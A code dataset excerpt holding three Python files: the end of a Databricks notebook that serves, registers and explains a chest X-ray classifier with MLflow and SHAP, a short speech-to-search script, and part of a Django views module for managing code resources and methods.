path.exists(path_to_model):\n print(\"A model already exists in this path. It will be overwritten...\")\n shutil.rmtree(path_to_model)\n mlflow.pytorch.save_model(model, path_to_model)\nelse:\n mlflow.pytorch.save_model(model, path_to_model)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Although not shown here for brevity, this model's results are comparable to those cited in the [paper](https://openaccess.thecvf.com/content_cvpr_2017/papers/Wang_ChestX-ray8_Hospital-Scale_Chest_CVPR_2017_paper.pdf) - about 0.6-0.7 AUC for each of the 14 classes. The auto-logged results are available in MLflow:\n# MAGIC \n# MAGIC \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### PSA: Don't Try (To Diagnose Chest X-rays) At Home!\n# MAGIC \n# MAGIC The author is not a doctor, and probably neither are you! It should be said that this is _not_ necessarily the best model, and certainly should not be used to actually diagnose patients! It's just an example.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Serving the Model with MLflow\n# MAGIC \n# MAGIC This auto-logged model is useful raw material. The goal is to deploy it as a REST API, and [MLflow can create a REST API and Docker container](https://mlflow.org/docs/latest/models.html#deploy-mlflow-models) around a `pyfunc` model, and even deploy to Azure ML or AWS SageMaker for you. It can also be deployed within Databricks for testing.\n# MAGIC \n# MAGIC However, there are a few catches which mean we can't directly deploy the model above:\n# MAGIC \n# MAGIC - It accepts images as input, but these can't be directly specified in the JSON request to the REST API\n# MAGIC - Its output are logits, when probabilities (and label names) would be more useful\n# MAGIC \n# MAGIC It is however easy to define a custom `PythonModel` that will wrap the PyTorch model and perform additional pre- and post-processing. This model accepts a base64-encoded image file, and returns the probability each label:\n\n# COMMAND ----------\n\nimport torch\nimport pandas as pd\nimport numpy as np\nimport base64\nfrom io import BytesIO\nfrom PIL import Image\nfrom mlflow.pyfunc import PythonModel\n\nclass XRayNNServingModel(PythonModel):\n def __init__(self, model, transforms, disease_names):\n self.model = model\n self.transforms = transforms\n self.disease_names = disease_names\n \n def get_model():\n return self.model\n \n def get_transforms():\n return self.transforms\n \n def get_disease_names():\n return disease_names\n\n def predict(self, context, model_input):\n def infer(b64_string):\n encoded_image = base64.decodebytes(bytearray(b64_string, encoding=\"utf8\"))\n image = Image.open(BytesIO(encoded_image)).convert(mode='L').resize((224,224), resample=Image.LANCZOS)\n image_bytes = np.asarray(image, dtype=np.uint8)\n transformed = self.transforms(image_bytes).unsqueeze(dim=0)\n output = self.model(transformed).squeeze()\n return torch.sigmoid(output).tolist()\n return pd.DataFrame(model_input.iloc[:,0].apply(infer).to_list(), columns=disease_names)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Now the new wrapped model is logged with MLflow:\n\n# COMMAND ----------\n\nimport mlflow.pyfunc\nimport mlflow.pytorch\nimport mlflow.models\nimport pytorch_lightning as pl\nimport PIL\nimport torchvision\n\n# Load PyTorch Lightning model\n# Loading the model previously saved\nloaded_model = mlflow.pytorch.load_model(path_to_model, map_location='cpu') \n\nwith mlflow.start_run():\n model_env = mlflow.pyfunc.get_default_conda_env()\n # Record specific additional dependencies required by the serving model\n model_env['dependencies'][-1]['pip'] += [\n f'torch=={torch.__version__}',\n f'torchvision=={torchvision.__version__}',\n f'pytorch-lightning=={pl.__version__}',\n f'pillow=={PIL.__version__}',\n ]\n # Log the model signature - just creates some dummy data of the right type to infer from\n signature = mlflow.models.infer_signature(\n pd.DataFrame([\"dummy\"], columns=[\"image\"]),\n pd.DataFrame([[0.0] * num_classes], columns=disease_names))\n python_model = XRayNNServingModel(loaded_model, transforms, disease_names)\n mlflow.pyfunc.log_model(\"model\", python_model=python_model, signature=signature, conda_env=model_env) # This autolog worked. Seems to be an issue with autologging pytorch-lightning models...\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Registering the Model with MLflow\n# MAGIC \n# MAGIC The [MLflow Model Registry](https://databricks.com/product/mlflow-model-registry) provides workflow management for the model promotion process, from Staging to Production. The new run created above can be registered directly from the MLflow UI:\n# MAGIC \n# MAGIC \n# MAGIC \n# MAGIC It can then be transitioned into the Production state directly, for simple purposes here. After that, enabling serving within Databricks is as simple as turning it on in the models' Serving tab:\n# MAGIC \n# MAGIC \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Accessing the Model with a REST Request\n# MAGIC \n# MAGIC Now, we can send images to the REST endpoint and observe its classifications. This could power a simple web application, but here, to demonstrate, it is called directly from a notebook.\n\n# COMMAND ----------\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nimage_path = \"/dbfs/datasets/ScaDaMaLe/nih-chest-xrays/images/raw/00000001_000.png\"\nplt.imshow(mpimg.imread(image_path), cmap='gray')\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Note:** In the next cell you need to use your Databricks token for accessing Databricks from the internet. It is best practice to use the Databricks Secrets CLI to avoid putting secret keys in notebooks. Please refer to [this guide](https://docs.databricks.com/security/secrets/index.html) for setting it up through the Databricks CLI.\n\n# COMMAND ----------\n\nimport base64\nimport requests\nimport pandas as pd\n\nwith open(image_path, \"rb\") as file:\n content = file.read()\n\ndataset = pd.DataFrame([base64.encodebytes(content)], columns=[\"image\"])\n# Note that you will still need a Databricks access token to send with the request. This can/should be stored as a secret in the workspace:\ntoken = dbutils.secrets.get(\"databricksEducational\", \"databricksCLIToken\") # These are just examples of a Secret Scope and Secret Key. Please refer to guide in above cell...\n\nresponse = requests.request(method='POST',\n headers={'Authorization': f'Bearer {token}'}, \n url='https://dbc-635ca498-e5f1.cloud.databricks.com/model/nih_xray/1/invocations',\n json=dataset.to_dict(orient='split'))\npd.DataFrame(response.json())\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC The model suggests that a doctor might examine this X-ray for Atelectasis and Infiltration, but a Hernia is unlikely, for example.\n# MAGIC But, why did the model think so? Fortunately there are tools that can explain the model's output in this case, and this will be demonstrated a little later.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Adding Webhooks for Model State Management\n# MAGIC \n# MAGIC [MLflow can now trigger webhooks](https://databricks.com/blog/2020/11/19/mlflow-model-registry-on-databricks-simplifies-mlops-with-ci-cd-features.html) when Model Registry events happen. Webhooks are standard 'callbacks' which let applications signal one another. For example, a webhook can cause a CI/CD test job to start and run tests on a model. In this simple example, we'll just set up a webhook that posts a message to a Slack channel.\n# MAGIC \n# MAGIC _Note_: the example below requires a [registered Slack webhook](https://api.slack.com/messaging/webhooks). Because the webhook URL is sensitive, it is stored as a secret in the workspace and not included inline.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The Slack Webhook part of the tutorial has not been tested. Feel free to try to set it up.\n\n# COMMAND ----------\n\nfrom mlflow.tracking.client import MlflowClient\nfrom mlflow.utils.rest_utils import http_request\nimport json\n\ndef mlflow_call_endpoint(endpoint, method, body = '{}'):\n client = MlflowClient()\n host_creds = client._tracking_client.store.get_host_creds()\n if method == 'GET':\n response = http_request(host_creds=host_creds, endpoint=f\"/api/2.0/mlflow/{endpoint}\", method=method, params=json.loads(body))\n else:\n response = http_request(host_creds=host_creds, endpoint=f\"/api/2.0/mlflow/{endpoint}\", method=method, json=json.loads(body))\n return response.json()\n\njson_obj = {\n \"model_name\": \"nih_xray\",\n \"events\": [\"MODEL_VERSION_CREATED\", \"TRANSITION_REQUEST_CREATED\", \"MODEL_VERSION_TRANSITIONED_STAGE\", \"COMMENT_CREATED\", \"MODEL_VERSION_TAG_SET\"],\n \"http_url_spec\": { \"url\": dbutils.secrets.get(\"demo-token-sean.owen\", \"slack_webhook\") }\n}\nmlflow_call_endpoint(\"registry-webhooks/create\", \"POST\", body=json.dumps(json_obj))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC As model versions are added, transitioned among stages, commented on, etc. a webhook will fire.\n# MAGIC \n# MAGIC \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Explaining Predictions\n# MAGIC \n# MAGIC [SHAP](https://shap.readthedocs.io/en/latest/) is a popular tool for explaining model predictions. It can explain virtually any classifier or regressor at the prediction level, and estimate how much each input feature contributed positively or negatively to the result, and by how much.\n# MAGIC \n# MAGIC In MLflow 1.12 and later, SHAP model explanations can be [logged automatically](https://www.mlflow.org/docs/latest/python_api/mlflow.shap.html):\n# MAGIC \n# MAGIC \n# MAGIC \n# MAGIC However, this model's inputs are not simple scalar features, but an image. SHAP does have tools like `GradExplainer` and `DeepExplainer` that are specifically designed to explain neural nets' classification of images. To use this, we do have to use SHAP manually instead of via MLflow's automated tools. However the result can be, for example, logged with a model in MLflow.\n# MAGIC \n# MAGIC Here we explain the model's top classification, and generate a plot showing which parts of the image most strongly move the prediction positively (red) or negatively (blue). The explanation is traced back to an early intermediate layer of densenet121.\n\n# COMMAND ----------\n\nimport numpy as np\nimport torch\nimport mlflow.pyfunc\nimport shap\n\n# Load the latest production model and its components\npyfunc_model = mlflow.pyfunc.load_model(\"models:/nih_xray/production\")\ntransforms = pyfunc_model._model_impl.python_model.transforms\nmodel = pyfunc_model._model_impl.python_model.model\ndisease_names = pyfunc_model._model_impl.python_model.disease_names\n\n# Let's pick an example that definitely exhibits some affliction\ndf = spark.read.table(\"nih_xray.images\")\nfirst_row = df.filter(\"Infiltration\").select(\"image\").limit(1).toPandas()\nimage = np.frombuffer(first_row[\"image\"].item(), dtype=np.uint8).reshape((224,224))\n\n# Only need a small sample for explanations\nsample = df.sample(0.02).select(\"image\").toPandas()\nsample_tensor = torch.cat([transforms(np.frombuffer(sample[\"image\"].iloc[idx], dtype=np.uint8).reshape((224,224))).unsqueeze(dim=0) for idx in range(len(sample))])\n\ne = shap.GradientExplainer((model, model.densenet.features[6]), sample_tensor, local_smoothing=0.1)\nshap_values, indexes = e.shap_values(transforms(image).unsqueeze(dim=0), ranked_outputs=3, nsamples=300)\n\nshap.image_plot(shap_values[0][0].mean(axis=0, keepdims=True),\n transforms(image).numpy().mean(axis=0, keepdims=True))\n\n# COMMAND ----------\n\nimport pandas as pd\n\npd.DataFrame(torch.sigmoid(model(transforms(image).unsqueeze(dim=0))).detach().numpy(), columns=disease_names).iloc[:,indexes.numpy()[0]]\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC \n# MAGIC This suggests that the small region at the top of left lung is more significant in causing the model to produce its positive classifications for Infiltration, Effusion and Cardiomegaly than most of the image, and the bottom of the left lung however contradicts those to some degree and is associated with lower probability of that classification.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC ## Managing Notebooks with Projects\n# MAGIC \n# MAGIC This notebook exists within a Project. This means it and any related notebooks are backed by a Git repository. The notebook can be committed, along with other notebooks, and observed in the source Git repository.\n# MAGIC \n# MAGIC \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Uploading Data to Databricks Shard (Mac)\n# MAGIC \n# MAGIC **Step 1:**\n# MAGIC Download [Homebrew](https://brew.sh/index_sv) - follow the instructions on the link.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 2:**\n# MAGIC Download python with brew in order to get pip on your computer. Follow this guide [here](https://docs.python-guide.org/starting/install3/osx/) for installing Python and adding it to your PATH.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 3:**\n# MAGIC Install Databricks CLI\n# MAGIC \n# MAGIC Run the following command in your terminal to install the Databricks Command Line Interface:\n# MAGIC \n# MAGIC `pip install databricks-cli`\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 4:** Press your user symbol in the upper right of this page and press _User Settings_. Press _Access Tokens_ and generate a new token with an appropriate name and appropriate lifetime. This is for connecting your local comuter to this specific Databricks shard.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 5:** Follow the instructions for configuring your Databricks CLI with your generated token [here](https://docs.databricks.com/dev-tools/cli/index.html). \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 6:** Download the data from [Kaggle Chest X-rays](https://www.kaggle.com/nih-chest-xrays/data).\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 7:** Run the command below in your local terminal. **Note:** You might need to run multiple commands since the Kaggle images lies in different folders after download. In this case, separate each command with a `;`.\n# MAGIC \n# MAGIC `dbfs cp -r dbfs:/datasets/;`\n# MAGIC `dbfs cp -r dbfs:/datasets/`\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 8:** After the commands have successfully completed, the images should lie within the Databricks shard in the following path:\n# MAGIC \n# MAGIC `/dbfs/datasets/`\n# MAGIC \n# MAGIC You can verify this by running the following command in any notebook on the Databricks shard which you uploaded the images into:\n# MAGIC \n# MAGIC `%sh ls /dbfs/datasets/`","sub_path":"dbcArchives/2021/000_6-sds-3-x-dl/064x_MLOps_with_Pytorch_and_MLflow_for_Image_Classification.py","file_name":"064x_MLOps_with_Pytorch_and_MLflow_for_Image_Classification.py","file_ext":"py","file_size_in_byte":29478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"436811985","text":"from src.acquire import AudioAcquire\nfrom src.speech_to_text import speech_to_text\nfrom src.search import Search\n\n\ndef main():\n a = AudioAcquire()\n s = Search()\n\n while True:\n input('Press Enter to acquire...')\n text = speech_to_text(a.read())\n s.google(text)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"525246541","text":"\"\"\"\nmethod.views\n\"\"\"\nfrom datetime import datetime\nimport itertools\nimport logging\nfrom subprocess import CalledProcessError\n\nfrom django.db import transaction\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader\n\nfrom container.models import Container\nfrom metadata.models import CompoundDatatype\nfrom method.models import CodeResource, Method, MethodDependency, \\\n MethodFamily, CodeResourceRevision, DockerImage\nfrom method.forms import CodeResourcePrototypeForm, CodeResourceRevisionForm, \\\n CodeResourceDetailsForm, CodeResourceRevisionDetailsForm, \\\n MethodFamilyForm, MethodForm, MethodReviseForm, MethodDependencyForm, \\\n MethodDetailsForm, TransformationXputForm, XputStructureForm, DockerImageForm\nfrom portal.views import developer_check, admin_check\n\n\nLOGGER = logging.getLogger(__name__)\n\n\n@login_required\n@user_passes_test(developer_check)\ndef resources(request):\n \"\"\"\n Display a list of all code resources (parents) in database\n \"\"\"\n t = loader.get_template('method/resources.html')\n c = {\n \"is_user_admin\": admin_check(request.user)\n }\n\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef resource_revisions(request, pk):\n \"\"\"\n Display a list of all revisions of a specific Code Resource in database.\n \"\"\"\n coderesource = CodeResource.check_accessible(pk, request.user)\n\n addable_users, addable_groups = coderesource.other_users_groups()\n\n if request.method == 'POST':\n # We are attempting to update the CodeResource's metadata/permissions.\n resource_form = CodeResourceDetailsForm(\n request.POST,\n addable_users=addable_users,\n addable_groups=addable_groups,\n instance=coderesource\n )\n\n if resource_form.is_valid():\n try:\n coderesource.name = resource_form.cleaned_data[\"name\"]\n coderesource.description = resource_form.cleaned_data[\"description\"]\n coderesource.clean()\n coderesource.save()\n coderesource.grant_from_json(resource_form.cleaned_data[\"permissions\"])\n\n # Success -- go back to the resources page.\n return HttpResponseRedirect('/resources')\n except (AttributeError, ValidationError, ValueError) as e:\n LOGGER.exception(e.message)\n resource_form.add_error(None, e)\n\n else:\n resource_form = CodeResourceDetailsForm(\n addable_users=addable_users,\n addable_groups=addable_groups,\n initial={\"name\": coderesource.name, \"description\": coderesource.description}\n )\n\n revisions = CodeResourceRevision.filter_by_user(\n request.user,\n queryset=coderesource.revisions.all()).order_by('-revision_number')\n if len(revisions) == 0:\n # Go to the resource_revision_add page to create a first revision.\n t = loader.get_template('method/resource_revision_add.html')\n crv_form = CodeResourceRevisionForm()\n\n c = {\n 'revision_form': crv_form,\n 'parent_revision': None,\n 'coderesource': coderesource,\n }\n return HttpResponse(t.render(c, request))\n\n # Load template, setup context\n t = loader.get_template('method/resource_revisions.html')\n c = {\n 'coderesource': coderesource,\n \"resource_form\": resource_form,\n 'revisions': revisions,\n 'is_admin': admin_check(request.user),\n \"is_owner\": request.user == coderesource.user\n }\n return HttpResponse(t.render(c, request))\n\n\n@transaction.atomic\ndef _make_crv(file_in_memory,\n creating_user,\n crv_form,\n parent_revision=None,\n code_resource=None):\n \"\"\"\n Helper that creates a CodeResourceRevision (and a CodeResource as well if appropriate).\n \"\"\"\n assert isinstance(crv_form, (CodeResourcePrototypeForm, CodeResourceRevisionForm))\n # If parent_revision is specified, we are only making a CodeResourceRevision and not its parent CodeResource.\n assert not (parent_revision is None and isinstance(crv_form, CodeResourceRevision))\n\n cr_filename = \"\" if file_in_memory is None else file_in_memory.name\n\n if code_resource is None and parent_revision is not None:\n code_resource = parent_revision.coderesource\n if code_resource is None:\n # crv_form is a CodeResourcePrototypeForm.\n code_resource = CodeResource(\n name=crv_form.cleaned_data['resource_name'],\n description=crv_form.cleaned_data['resource_desc'],\n filename=cr_filename,\n user=creating_user\n )\n try:\n code_resource.full_clean()\n # Skip the clean until later; after all, we're protected by a transaction here.\n code_resource.save()\n except ValidationError as e:\n crv_form.add_error('content_file', e.error_dict.get('filename', []))\n crv_form.add_error('resource_name', e.error_dict.get('name', []))\n crv_form.add_error('resource_desc', e.error_dict.get('description', []))\n raise e\n\n code_resource.grant_from_json(crv_form.cleaned_data[\"permissions\"])\n\n rev_name = \"Prototype\"\n rev_desc = crv_form.cleaned_data[\"resource_desc\"]\n else:\n rev_name = crv_form.cleaned_data[\"revision_name\"]\n rev_desc = crv_form.cleaned_data[\"revision_desc\"]\n\n # Modify actual filename prior to saving revision object.\n if file_in_memory is not None:\n file_in_memory.name += '_' + datetime.now().strftime('%Y%m%d%H%M%S')\n\n revision = CodeResourceRevision(\n revision_parent=parent_revision,\n revision_name=rev_name,\n revision_desc=rev_desc,\n coderesource=code_resource,\n content_file=file_in_memory,\n user=creating_user\n )\n # This sets the MD5.\n\n try:\n revision.clean()\n except ValidationError as e:\n crv_form.add_error(None, e)\n raise e\n\n revision.save()\n revision.grant_from_json(crv_form.cleaned_data[\"permissions\"])\n\n try:\n code_resource.full_clean()\n revision.full_clean()\n except ValidationError as e:\n crv_form.add_error(None, e)\n raise e\n\n return revision\n\n\n@login_required\n@user_passes_test(developer_check)\ndef resource_add(request):\n \"\"\"\n Add a new code resource with a prototype (no revisions). The FILENAME of the prototype will\n be used as the symbolic filename for all subsequent revisions of this code resource.\n The actual filename will be suffixed with date and time when saved to the filesystem.\n On execution, Shipyard will refer to a revision's CodeResource to get the original filename and\n copy the revision file over to the sandbox.\n NAME provides an opportunity to provide a more intuitive and user-accessible name.\n \"\"\"\n creating_user = request.user\n\n if request.method != 'POST':\n resource_form = CodeResourcePrototypeForm()\n else:\n # Using forms here provides validation and better parsing of parameters in the request.\n resource_form = CodeResourcePrototypeForm(request.POST, request.FILES)\n\n if resource_form.is_valid():\n # Now we can try to create objects in the database, catching backend-raised exceptions as we go.\n try:\n _make_crv(request.FILES.get(\"content_file\", None),\n creating_user,\n resource_form)\n\n # Success -- return to the resources root page.\n return HttpResponseRedirect('/resources')\n except ValidationError:\n # All forms have the appropriate errors attached.\n pass\n\n t = loader.get_template('method/resource_add.html')\n c = {\n 'resource_form': resource_form,\n }\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef resource_revision_add(request, pk):\n \"\"\"\n Add a code resource revision. The form will initially be populated with values of the last\n revision to this code resource.\n \"\"\"\n t = loader.get_template('method/resource_revision_add.html')\n c = {}\n creating_user = request.user\n parent_revision = CodeResourceRevision.check_accessible(pk, creating_user)\n coderesource = parent_revision.coderesource\n\n if request.method == 'POST':\n # Use forms here, just as in resource_add. Again note that entries of dep_forms may be None.\n revision_form = CodeResourceRevisionForm(request.POST, request.FILES)\n if not revision_form.is_valid():\n c.update({\n 'revision_form': revision_form,\n 'parent_revision': parent_revision,\n 'coderesource': coderesource\n })\n return HttpResponse(t.render(c, request))\n\n try:\n _make_crv(request.FILES.get('content_file', None), creating_user, revision_form,\n parent_revision=parent_revision)\n except ValidationError:\n # The forms have all been updated with the appropriate errors.\n c.update(\n {\n 'revision_form': revision_form,\n 'parent_revision': parent_revision,\n 'coderesource': coderesource\n })\n return HttpResponse(t.render(c, request)) # CodeResourceRevision object required for next steps\n\n # Success; return to the resources page.\n return HttpResponseRedirect('/resources')\n\n # Having reached here, we know that this CR is being revised. Return a form pre-populated\n # with default info.\n parent_users_allowed = [x.username for x in parent_revision.users_allowed.all()]\n parent_groups_allowed = [x.name for x in parent_revision.groups_allowed.all()]\n crv_form = CodeResourceRevisionForm(\n initial={\n \"permissions\": [parent_users_allowed, parent_groups_allowed]\n }\n )\n\n c.update(\n {\n 'revision_form': crv_form,\n 'parent_revision': parent_revision,\n 'coderesource': coderesource\n }\n )\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef resource_revision_view(request, pk):\n revision = CodeResourceRevision.check_accessible(pk, request.user)\n addable_users, addable_groups = revision.other_users_groups()\n\n if request.method == 'POST':\n # We are attempting to update the CodeResourceRevision's metadata/permissions.\n revision_form = CodeResourceRevisionDetailsForm(\n request.POST,\n addable_users=addable_users,\n addable_groups=addable_groups,\n instance=revision\n )\n\n if revision_form.is_valid():\n try:\n revision.revision_name = revision_form.cleaned_data[\"revision_name\"]\n revision.revision_desc = revision_form.cleaned_data[\"revision_desc\"]\n revision.save()\n revision.grant_from_json(revision_form.cleaned_data[\"permissions\"])\n revision.clean()\n\n # Success -- go back to the CodeResource page.\n return HttpResponseRedirect('/resource_revisions/{}'.format(revision.coderesource.pk))\n except (AttributeError, ValidationError, ValueError) as e:\n LOGGER.exception(e.message)\n revision_form.add_error(None, e)\n\n else:\n revision_form = CodeResourceRevisionDetailsForm(\n addable_users=addable_users,\n addable_groups=addable_groups,\n initial={\n \"revision_name\": revision.revision_name,\n \"revision_desc\": revision.revision_desc\n }\n )\n\n t = loader.get_template(\"method/resource_revision_view.html\")\n c = {\n \"revision\": revision,\n \"revision_form\": revision_form,\n \"is_owner\": revision.user == request.user,\n \"is_admin\": admin_check(request.user)\n }\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef method_families(request):\n \"\"\"\n Display a list of all MethodFamily objects in database.\n \"\"\"\n t = loader.get_template(\"method/method_families.html\")\n c = {\n \"is_user_admin\": admin_check(request.user)\n }\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef methods(request, pk):\n \"\"\"\n Display a list of all Methods within a given MethodFamily.\n \"\"\"\n family = MethodFamily.check_accessible(pk, request.user)\n addable_users, addable_groups = family.other_users_groups()\n\n if request.method == 'POST':\n # We are attempting to update the MethodFamily's metadata/permissions.\n mf_form = MethodFamilyForm(\n request.POST,\n addable_users=addable_users,\n addable_groups=addable_groups,\n instance=family\n )\n\n if mf_form.is_valid():\n try:\n family.name = mf_form.cleaned_data[\"name\"]\n family.description = mf_form.cleaned_data[\"description\"]\n family.save()\n family.grant_from_json(mf_form.cleaned_data[\"permissions\"])\n family.clean()\n\n # Success -- go back to the resources page.\n return HttpResponseRedirect('/method_families')\n except (AttributeError, ValidationError, ValueError) as e:\n LOGGER.exception(e.message)\n mf_form.add_error(None, e)\n\n else:\n mf_form = MethodFamilyForm(\n addable_users=addable_users,\n addable_groups=addable_groups,\n initial={\"name\": family.name, \"description\": family.description}\n )\n\n t = loader.get_template('method/methods.html')\n c = {\n \"family\": family,\n \"family_form\": mf_form,\n \"is_admin\": admin_check(request.user),\n \"is_owner\": request.user == family.user\n }\n return HttpResponse(t.render(c, request))\n\n\ndef _make_dep_forms(query_dict, user):\n \"\"\"\n Helper for resource_add and resource_revision_add that creates the MethodDependencyForms.\n \"\"\"\n num_dep_forms = sum([1 for k in query_dict.keys() if k.startswith('coderesource_')])\n dep_forms = []\n for i in range(num_dep_forms):\n this_cr = query_dict['coderesource_'+str(i)] # PK of the Method\n if this_cr == '':\n # Ignore blank CR dependency forms.\n continue\n\n dep_forms.append(\n MethodDependencyForm(\n {\n 'coderesource': query_dict['coderesource_'+str(i)],\n 'revisions': query_dict['revisions_'+str(i)],\n 'path': query_dict['path_'+str(i)],\n 'filename': query_dict['filename_'+str(i)]\n },\n user=user,\n auto_id='id_%s_'+str(i)\n )\n )\n return dep_forms\n\n\ndef create_method_forms(request_post, user, family=None):\n \"\"\"\n Helper function for method_add() that creates Forms from the\n provided information and validates them.\n \"\"\"\n query_dict = request_post.dict()\n if 'name' in query_dict:\n assert family is None\n family = MethodFamily(user=user)\n family_form = MethodFamilyForm(request_post, instance=family)\n else:\n assert family is not None\n family_form = MethodFamilyForm(\n {\n \"name\": family.name,\n \"description\": family.description\n },\n instance=family\n )\n family_form.is_valid()\n\n # Populate main form with submitted values.\n if \"coderesource\" in query_dict:\n method_form = MethodForm(request_post, user=user)\n else:\n method_form = MethodReviseForm(request_post)\n method_form.is_valid()\n # Determine whether the confirm_shebang button has been clicked.\n # NOTE: confirm_shebang is a checkbox html element; according to HTML spec, it will only\n # be present iff its true. ==> we cannot rely on it being present, and set the value\n # to false if it is absent.\n has_override = (request_post.get(\"confirm_shebang\", 'off') == 'on')\n # NOTE: for shebang_val, we must differentiate between yes, no and undefined\n missing_shebang = _get_shebang_code(method_form) == SHEBANG_NO\n show_shebang_field = query_dict[\"SHOW_SHEBANG_FIELD\"] = missing_shebang\n query_dict[\"SHEBANG_OK\"] = (not missing_shebang or has_override)\n\n etxt = \"\"\"The code resource should be executable, which means that the file usually starts\nwith a shebang: '#!'. The currently selected code resource does not.\nIf you know what you are doing, you can override this requirement here.\"\"\"\n if show_shebang_field and not has_override:\n method_form.add_error(\"confirm_shebang\", etxt)\n\n # Populate in/output forms with submitted values.\n input_forms = []\n output_forms = []\n for xput_type, formlst in [(\"in\", input_forms), (\"out\", output_forms)]:\n num_forms = sum(k.startswith('dataset_name_{}_'.format(xput_type)) for k in query_dict)\n for i in range(num_forms):\n auto_id = \"id_%s_{}_{}\".format(xput_type, i)\n t_form = TransformationXputForm(\n {'dataset_name': query_dict['dataset_name_{}_{}'.format(xput_type, i)]},\n auto_id=auto_id)\n t_form.is_valid()\n\n xs_form = XputStructureForm(\n {'compounddatatype': query_dict['compounddatatype_{}_{}'.format(xput_type, i)],\n 'min_row': query_dict['min_row_{}_{}'.format(xput_type, i)],\n 'max_row': query_dict['max_row_{}_{}'.format(xput_type, i)]},\n user=user,\n auto_id=auto_id)\n xs_form.is_valid()\n formlst.append((t_form, xs_form))\n\n dep_forms = _make_dep_forms(request_post.dict(), user)\n # the methods must have at least one input and output each.\n if len(input_forms) == 0:\n tx_form = TransformationXputForm(auto_id='id_%s_in_0')\n xs_form = XputStructureForm(user=user, auto_id='id_%s_in_0')\n input_forms.append((tx_form, xs_form))\n if len(output_forms) == 0:\n tx_form = TransformationXputForm(auto_id='id_%s_out_0')\n xs_form = XputStructureForm(user=user, auto_id='id_%s_out_0')\n output_forms.append((tx_form, xs_form))\n\n return family_form, method_form, dep_forms, input_forms, output_forms, query_dict\n\n\nSHEBANG_YES = 1\nSHEBANG_NO = 2\nSHEBANG_UNDEF = 3\n\n\ndef _get_shebang_code(method_form):\n # Retrieve the CodeResource revision and return whether it has a #! on its first line or not.\n # This routine can return three different values:\n # SHEBANG_UNDEF: resource driver is defined\n # SHEBANG_YES, SHEBANG_NO: code resource is defined, and 'code resource has a shebang'\n # This logic is required because a form can be submitted with an empty code_resource\n # field. In that case, the whole form will fail, but we need to know, independently of\n # that form failing, whether we should display the 'no shebang override' button to the user.\n try:\n coderesource_revision = CodeResourceRevision.objects.get(pk=method_form.cleaned_data['driver_revisions'])\n except (KeyError, ValueError, CodeResourceRevision.DoesNotExist):\n return SHEBANG_UNDEF\n # We do have a code resource defined;\n # now check to see whether the driver code begins with a shebang\n try:\n coderesource_revision.content_file.open()\n first_line = coderesource_revision.content_file.file.readline()\n coderesource_revision.content_file.close()\n except Exception as exc:\n method_form.add_error(\"driver_revisions\", exc)\n return SHEBANG_UNDEF\n tdct = {True: SHEBANG_YES, False: SHEBANG_NO}\n return tdct[first_line.startswith(\"#!\")]\n\n\ndef create_method_from_forms(family_form, method_form, dep_forms, input_forms, output_forms, creating_user,\n family=None, parent_method=None):\n \"\"\"\n Given Forms representing the MethodFamily, Method, inputs, and outputs, create a Method.\n\n Warning: this routine has side effects (it can mod its arguments):\n If an error occurs:\n return None and update the forms with errors.\n else:\n return the new method and the forms are returned without modification.\n \"\"\"\n # This assures that not both family_form and family are None.\n assert family is not None or family_form is not None\n\n for dep_form in dep_forms:\n assert isinstance(dep_form, MethodDependencyForm) or dep_form is None\n\n # Retrieve the CodeResource revision as driver.\n try:\n coderesource_revision = CodeResourceRevision.objects.get(\n pk=method_form.cleaned_data['driver_revisions'])\n except CodeResourceRevision.DoesNotExist:\n coderesource_revision = None\n\n # Retrieve the Container.\n try:\n container = Container.objects.get(\n pk=method_form.cleaned_data['container'])\n except Container.DoesNotExist:\n container = None\n\n new_method = None\n try:\n # Note how the except blocks re-raise their exception: that is to terminate\n # this transaction.\n with transaction.atomic():\n if family is None:\n try:\n family = family_form.save()\n family.grant_from_json(method_form.cleaned_data[\"permissions\"])\n family.full_clean()\n\n except ValidationError as e:\n family_form.add_error(None, e)\n raise e\n\n new_method = Method(\n family=family,\n revision_name=method_form.cleaned_data['revision_name'],\n revision_desc=method_form.cleaned_data['revision_desc'],\n revision_parent=parent_method,\n driver=coderesource_revision,\n container=container,\n reusable=method_form.cleaned_data['reusable'],\n 